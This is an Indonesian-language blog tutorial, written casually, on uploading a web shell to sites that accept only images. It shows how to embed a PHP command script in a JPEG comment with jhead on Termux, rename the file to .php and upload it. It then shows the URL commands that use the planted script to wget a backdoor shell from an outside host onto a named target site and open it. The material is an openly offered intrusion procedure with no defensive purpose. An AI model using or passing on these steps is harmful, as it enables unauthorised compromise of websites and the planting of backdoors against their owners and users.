Breaking

Selasa, 05 Maret 2019

Inject php script ke image dengan jhead

Kadang ada aja website pas mau upload shell tapi cuma bisa upload gambar aja. Pernah ngalamin gk sih? W sih sering ekekekek :"v pengennya sih di tamper tapi apa daya kita user andro :'(.

Nah disini w mau kasih solusinya muehehe caranya cukup mudah tinggal ikuti saja tutorial dibawah.
Inject php script ke image dengan jhead di termux.

Siapkan dulu gambar yg pengen di injek, kalo mau ambil aja gambar dibawah ini gan hehe
Yg pasti kalian harus download aplikasi termux dulu di playstore iyh gan.

Langsung aja masukan command dibawah ke termux.
$pkg install jhead
$jhead -purejpg namagambar.jpg
(Untuk membersihkan comment dari gambar)
$jhead -ce namagambar.jpg
(Untuk memunculkan vim text editor seperti gambar dibawah ini)
Masukkan script inject php ke vim text editor, Monggo ambil scriptnya Disini onii-chan lalu kalian save. Cara save nya tekan tombol ESC di termux lalu ketikkan :x. Jika sukses akan ada tulisan modified namagambar.jpg
$jhead namagambar.jpg
Jika muncul code pada gambar seperti diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php lalu upload ditarget kalian.

Nah gimana cara eksekusi nya?

/namafile.php?cmd=
Untuk upload shell atau backdoor kalian bisa mengunakan fungsi wget, curl, atau yang lain karena terkadang ada website yang tidak suport wget atau curl.

lusuka.co.li/namafile.php?cmd=wget http://linkshell.com/shell.txt
Setelah itu kita rename dari shell.txt ke shell.php

lusuka.co.li/namafile.php?cmd=mv shell.txt shell.php

Atau bisa juga seperti ini
lusuka.co.li/namafile.php?cmd=wget linkshell.com/shell.txt -O shell.php
Tinggal akses Shell mu kawan qu h3h3

lusuka.co.li/shell.php


Tidak ada komentar:

Posting Komentar